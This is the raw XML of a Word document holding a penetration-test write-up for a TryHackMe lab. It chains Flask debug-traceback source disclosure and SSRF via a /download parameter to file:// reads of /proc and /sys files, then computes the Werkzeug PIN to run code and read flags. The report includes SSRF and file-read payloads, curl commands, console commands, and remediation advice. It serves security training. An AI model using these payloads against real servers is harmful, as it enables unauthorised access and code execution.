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C00000"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">PENETRATION TESTING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Web Application Security Assessment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Target: 10.49.146.155  |  Environment: TryHackMe Lab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Flask/Werkzeug web application running on 10.49.146.155 was assessed and found to contain multiple critical vulnerabilities forming a complete attack chain from information disclosure through to Remote Code Execution (RCE). Three flags were successfully captured during the assessment.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2. Flags Captured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THM{Hello_Im_just_an_API_key}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Source code disclosure via debug traceback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thm{c4n_i_haz_flagz_plz?}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SSRF to internal admin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THM{SSRF2RCE_2_1337_4_M3}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RCE via Werkzeug console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3. Step-by-Step Attack Chain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1 - Source Code Disclosure via Debug Mode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Vulnerability: Flask debug mode enabled in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was running with debug=True, which exposed full source code in error tracebacks. By triggering an intentional error, the backend source code was revealed including a hardcoded API key.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Evidence - Source Code in Traceback:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:before="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715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Key found in source code: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X-API-KEY: THM{Hello_Im_just_an_API_key}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2 - Directory Discovery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Vulnerability: No access controls on sensitive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manually browsing the application, two sensitive internal directories were identified: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http://10.49.146.155/admin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http://10.49.146.155/console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3 - Server-Side Request Forgery (SSRF)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Vulnerability: Unvalidated user input in server parameter passed directly to pycurl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/download endpoint accepted a user-controlled server parameter which was passed directly to pycurl without validation. This allowed the server to make requests on behalf of the attacker to internal resources.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Original endpoint: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http://10.49.146.155/download?server=secure-file-storage.com:8087&amp;id=75482342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SSRF payload to access admin page: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http://10.49.146.155/download?server=http://127.0.0.1:8087/admin%3F&amp;id=1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Result - Admin Flag:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:before="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4762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Flag 2 captured: thm{c4n_i_haz_flagz_plz?}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4 - Internal File Read via file:// Scheme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Vulnerability: pycurl accepted file:// URIs allowing filesystem reads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pycurl library accepted file:// URIs, allowing direct reading of internal server files. The following commands were used to collect system fingerprint data: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Read cgroup for Container ID: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curl --path-as-is "http://10.49.146.155/download?server=file:///proc/self/cgroup%3F&amp;id=1" -o cgroup.txt &amp;&amp; cat cgroup.txt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cgroup Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:before="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4762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Read MAC Address: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curl --path-as-is "http://10.49.146.155/download?server=file:///sys/class/net/eth0/address%3F&amp;id=1" -o mac.txt &amp;&amp; cat mac.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:before="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="57150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Read Boot ID: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curl --path-as-is "http://10.49.146.155/download?server=file:///proc/sys/kernel/random/boot_id%3F&amp;id=1" -o boot.txt &amp;&amp; cat boot.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:before="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="57150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collected via file reads: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02:42:ac:14:00:02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88799785-f4dc-419c-bd4c-288fc211c42c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77c09e05c4a947224997c3baa49e5edf161fd116568e90a28a60fca6fde049ca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/usr/src/app/app.py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(from traceback)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ZDvU4zZHfjlEfoQOpbDa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5 - Werkzeug Console Access &amp; Remote Code Execution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Vulnerability: Werkzeug debug console exposed with calculable PIN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the system fingerprint values collected in Step 4, the Werkzeug debugger PIN was calculated. The console was unlocked and Python commands were executed directly on the server.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Console Commands Executed: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&gt;&gt;&gt; import os; os.listdir("/usr/src/app")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&gt;&gt;&gt; with open('/usr/src/app/flag-982374827648721338.txt', 'r') as f: content = f.read(); print(content)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Console Output showing RCE and Flag:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:before="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="57150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Flag 3 captured: THM{SSRF2RCE_2_1337_4_M3}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4. Vulnerability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430"/>
        <w:gridCol w:w="143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Debug Mode Enabled in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 via Unvalidated server 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API Key in Source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file:// Scheme Allowed in pycurl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Werkzeug Console Exposed Publicly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IP-based Admin Access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5. Attack Chain Diagram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Website --&gt; Debug Error --&gt; Source Code Leaked --&gt; API Key Found (Flag 1)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|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v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SSRF via /download?server= parameter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|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v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Internal Admin Page --&gt; Flag 2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|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v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file:// read --&gt; MAC + Boot ID + Container ID collected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|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v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Werkzeug PIN calculated --&gt; Console unlocked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|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v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RCE --&gt; Directory listed --&gt; Flag 3 found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6.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mode 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debug=False in production. Never expose tracebacks publicly.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 vulnerability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allowed server values. Block internal IP ranges.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API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environment variables for all secrets. Rotate the exposed key immediately.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file:// scheme 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pycurl to HTTP/HTTPS schemes only. Validate all URLs.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Werkzeug console exposed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expose the debug console publicly. Disable in production.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IP-based auth on /admin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proper authentication (OAuth, session tokens, etc).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Report generated as part of TryHackMe lab assessment.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45ab667457624b5c76a00d94777dfdd5c66c9c.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/726e1e1f47171344d82ac43ef2768c225bfc1745.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/c9e76f59b5494a8e5fea7f66144f5c1784efd067.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/9683c41bdf67693fa5e01a6c52756679aa2a9ddc.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/384c9df3403ac5c6af6e8a3f196de416fefcdf02.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/243e1fdabce0762377554b59881c965c81bb687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2026-05-14T22:10:55.197Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-14T22:10:55.211Z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